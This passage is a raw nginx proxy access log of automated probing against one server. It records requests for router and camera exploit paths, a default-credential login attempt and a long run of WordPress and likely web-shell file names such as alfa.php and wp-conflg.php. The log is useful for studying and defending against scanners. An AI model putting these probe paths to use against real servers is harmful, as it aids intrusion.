AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:23:49 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:24:55 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.187.35.158] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:27:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.8] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:27:26 +0000] 404 - GET http 91.82.83.208 "/aaa9" [Client 45.91.64.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[20/Jan/2026:13:27:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.91.64.8] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:27:26 +0000] 404 - GET http 91.82.83.208 "/aab9" [Client 45.91.64.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[20/Jan/2026:13:31:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:32:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:33:38 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:34:50 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:34:51 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:34:56 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:34:58 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:35:01 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:03 +0000] 400 - POST http 91.82.83.208 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:04 +0000] 400 - POST http 91.82.83.208 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:07 +0000] 400 - GET http 91.82.83.208 "/WuEL" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)" "-" +[20/Jan/2026:13:35:13 +0000] 400 - - http localhost "-" [Client 185.91.69.5] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:13:35:15 +0000] 400 - GET http 91.82.83.208 "/a" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:21 +0000] 400 - GET http 91.82.83.208 "/download/file.ext" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:24 +0000] 400 - GET http 91.82.83.208 "/SiteLoader" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:26 +0000] 400 - GET http 91.82.83.208 "/mPlayer" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:30 +0000] 400 - POST http 91.82.83.208 "/" [Client 185.91.69.5] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:35:35 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.91.69.5] [Length 632] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36" "-" +[20/Jan/2026:13:37:32 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=ec8&psd=ec8" [Client 223.123.43.69] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:13:39:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 44.252.100.122] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[20/Jan/2026:13:39:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 13.86.104.42] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[20/Jan/2026:13:42:00 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[20/Jan/2026:13:46:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[20/Jan/2026:13:46:08 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 20.65.177.158] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[20/Jan/2026:13:46:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:48:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:13:56:29 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:10:39 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:14:10:42 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.187.35.158] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:14:12:54 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:14:13:39 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 170.64.169.181] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:40 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 170.64.169.181] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:41 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:42 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php?rsd" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:43 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 170.64.169.181] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:44 +0000] 404 - GET http profibot.direct.quickconnect.to "/blog/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:45 +0000] 404 - GET http profibot.direct.quickconnect.to "/web/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:46 +0000] 404 - GET http profibot.direct.quickconnect.to "/wordpress/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/website/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:47 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/news/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/2018/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/2019/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/shop/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp1/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/test/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/media/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp2/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/site/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/cms/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/sito/wp-includes/wlwmanifest.xml" [Client 170.64.169.181] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:14:13:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 170.64.169.181] [Length 0] [Gzip -] "-" "-" +[20/Jan/2026:14:17:44 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:14:25:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/zwso.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:20 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/colors/blue/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/class19.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/class20.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/randkeyword.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:21 +0000] 404 - GET http profibot.direct.quickconnect.to "/fwe.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/images/m.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/g.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/tx1.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/xv.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/x56.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/htaccess.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:22 +0000] 404 - GET http profibot.direct.quickconnect.to "/readme.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/x50.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/fv.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php?" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/lsd.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:23 +0000] 404 - GET http profibot.direct.quickconnect.to "/as.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/wsd.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/gtc.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/atx.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/z60.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/403.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:24 +0000] 404 - GET http profibot.direct.quickconnect.to "/m.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/themes.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/about.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/wp-conflg.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/click.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/install.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:25 +0000] 404 - GET http profibot.direct.quickconnect.to "/lv.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/simple.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/cong.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/images/wp-login.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/cong.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/w.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:26 +0000] 404 - GET http profibot.direct.quickconnect.to "/404.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/0x.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:27 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/maint.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/classwithtostring.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/autoload_classmap.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/inputs.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/about.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/themes/twentytwentytwo/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/js/wp-conflg.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/wp-conflg.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/wp-conflg.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/manager.php?p=" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/item.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/plugins/Cache/footer.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/404.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/mail.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/sx.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/admin.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/alfa.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/1.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/byp.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-trackback.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/plugins.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/about.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/gmo.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/ID3/about.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/css/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/SimplePie/wp-login.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/about.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/filemanager/dialog.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/index.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/customize/about.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/index/function.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:33 +0000] 404 - GET http profibot.direct.quickconnect.to "/uploads/autoload_classmap.php" [Client 68.155.146.81] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:14:25:33 +0000] 404 - GET http profibot.direct.quickconnect.to 